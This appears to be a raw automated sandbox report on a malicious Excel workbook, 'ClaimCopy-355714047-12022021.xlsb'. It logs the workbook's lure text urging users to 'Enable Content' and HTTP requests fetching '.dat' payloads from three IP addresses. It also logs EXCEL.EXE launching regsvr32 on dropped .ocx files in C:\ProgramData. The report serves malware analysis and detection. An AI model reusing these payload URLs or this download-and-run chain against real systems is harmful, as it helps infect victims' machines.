Source: global traffic |
HTTP traffic detected: GET /574766024224.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /574766024224.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive |
Source: Joe Sandbox View |
IP Address: 45.142.211.62 45.142.211.62 |
Source: Joe Sandbox View |
IP Address: 158.69.133.78 158.69.133.78 |
Source: Joe Sandbox View |
IP Address: 185.82.126.78 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.142.211.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.82.126.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 158.69.133.78 |
Source: EXCEL.EXE, 00000000.00000002.1042379648.0000000007E14000.00000004.00000001.sdmp |
String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin) |
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: EXCEL.EXE, 00000000.00000002.1042379648.0000000007E14000.00000004.00000001.sdmp |
String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin) |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 19:49:37 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --> |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 19:51:44 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --> |
Source: EXCEL.EXE, 00000000.00000002.1040925299.0000000005297000.00000004.00000001.sdmp |
String found in binary or memory: http://158.69.133.78/574766024224.dat |
Source: EXCEL.EXE, 00000000.00000002.1041980288.0000000005B3D000.00000004.00000001.sdmp |
String found in binary or memory: http://158.69.133.78/574766024224.dat2 |
Source: EXCEL.EXE, 00000000.00000002.1040925299.0000000005297000.00000004.00000001.sdmp |
String found in binary or memory: http://185.82.126.78/574766024224.dat |
Source: EXCEL.EXE, 00000000.00000002.1041980288.0000000005B3D000.00000004.00000001.sdmp |
String found in binary or memory: http://185.82.126.78/574766024224.dat2 |
Source: EXCEL.EXE, 00000000.00000002.1041980288.0000000005B3D000.00000004.00000001.sdmp |
String found in binary or memory: http://185.82.126.78/574766024224.dat29 |
Source: EXCEL.EXE, 00000000.00000002.1040925299.0000000005297000.00000004.00000001.sdmp |
String found in binary or memory: http://45.142.211.62/574766024224.dat |
Source: EXCEL.EXE, 00000000.00000002.1040925299.0000000005297000.00000004.00000001.sdmp |
String found in binary or memory: http://45.142.211.62/574766024224.dat#/ |
Source: EXCEL.EXE, 00000000.00000002.1041980288.0000000005B3D000.00000004.00000001.sdmp |
String found in binary or memory: http://45.142.211.62/574766024224.dat2 |
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: regsvr32.exe, 00000006.00000002.1035342275.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1035333395.0000000003A00000.00000002.00020000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: regsvr32.exe, 00000006.00000002.1034758219.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1034921258.0000000001E40000.00000002.00020000.sdmp |
String found in binary or memory: http://servername/isapibackend.dll |
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: regsvr32.exe, 00000006.00000002.1035342275.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1035333395.0000000003A00000.00000002.00020000.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: EXCEL.EXE, 00000000.00000002.1041541153.0000000005587000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036389429.0000000004AC7000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036411560.0000000004A37000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036402888.0000000004C57000.00000002.00020000.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: global traffic |
HTTP traffic detected: GET /574766024224.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /574766024224.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive |
Source: Screenshot number: 4 |
Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 ~EcmwARNNG Thisfileoriginate |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document. |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us |
Source: ClaimCopy-355714047-12022021.xlsb |
Macro extractor: Sheet name: Tiposa1 |
Source: ClaimCopy-355714047-12022021.xlsb |
Macro extractor: Sheet name: Tiposa |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_02197820 |
0_2_02197820 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_02196753 |
0_2_02196753 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_02196340 |
0_2_02196340 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_02196743 |
0_2_02196743 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_021966F3 |
0_2_021966F3 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_021966E8 |
0_2_021966E8 |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx |
Jump to behavior |
Source: EXCEL.EXE, 00000000.00000002.1041026257.00000000053A0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1036044186.00000000048E0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1036063924.0000000004850000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1036057215.0000000004A70000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.808723112.00000000048A0000.00000002.00020000.sdmp |
Binary or memory string: .VBPud<_ |
Source: ClaimCopy-355714047-12022021.xlsb |
Initial sample: OLE zip file path = xl/media/image1.jpg |
Source: ClaimCopy-355714047-12022021.xlsb |
Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin |
Source: C8260000.0.dr |
Initial sample: OLE zip file path = xl/media/image1.jpg |
Source: C8260000.0.dr |
Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: EXCEL.EXE, 00000000.00000002.1035010452.00000000008B0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1034677381.0000000000950000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1034864920.0000000000A40000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1034863173.0000000000A20000.00000002.00020000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: EXCEL.EXE, 00000000.00000002.1035010452.00000000008B0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1034677381.0000000000950000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1034864920.0000000000A40000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1034863173.0000000000A20000.00000002.00020000.sdmp |
Binary or memory string: !Progman |
Source: EXCEL.EXE, 00000000.00000002.1035010452.00000000008B0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.1034677381.0000000000950000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.1034864920.0000000000A40000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.1034863173.0000000000A20000.00000002.00020000.sdmp |
Binary or memory string: Program Manager< |